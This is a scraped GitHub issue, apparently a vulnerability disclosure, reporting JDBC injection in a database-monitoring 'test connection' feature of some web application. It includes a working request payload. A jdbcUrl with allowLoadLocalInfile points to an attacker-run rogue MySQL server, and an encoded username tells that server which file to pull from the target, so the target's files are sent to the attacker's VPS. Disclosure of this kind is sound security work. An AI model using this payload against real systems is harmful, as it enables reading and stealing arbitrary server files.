You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
JDBC Injection in Database Monitoring. Allow users to read any file
Details
Allowing custom URLs in select database monitoring leads us to use arbitrary parameters to cause files to be read
Use the following tool https://github.com/4ra1n/mysql-fake-server
Execute java -jar fake-mysql-cli-0.0.4.jar on vps
Select edit database and put the following payload into the url
POST /api/database/testConnect HTTP/1.1
{"id":"c4f72159fd87484a90d33c4a7a8619d1","name":"数据库","jdbcUrl":"jdbc:mysql://xxxx:3308/test?allowLoadLocalInfile=true","userName":"base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=","pwd":"root","createBy":"admin","createTime":"2023-12-27 10:51:22","updateBy":"admin","updateTime":"2023-12-27 10:51:22"}
Then click Test to send the request and our tool will output the following message
At the same time, the directory where we start the tool generates the ./fake-server-files directory, which contains the contents of the files we read
Impact
It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats
Summary
JDBC Injection in Database Monitoring. Allow users to read any file
Details
Allowing custom URLs in select database monitoring leads us to use arbitrary parameters to cause files to be read
Use the following tool https://github.com/4ra1n/mysql-fake-server
Execute
java -jar fake-mysql-cli-0.0.4.jar
on vpsSelect edit database and put the following payload into the url
Then click Test to send the request and our tool will output the following message
At the same time, the directory where we start the tool generates the ./fake-server-files directory, which contains the contents of the files we read
Impact
It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats
Fix sample code:
The text was updated successfully, but these errors were encountered: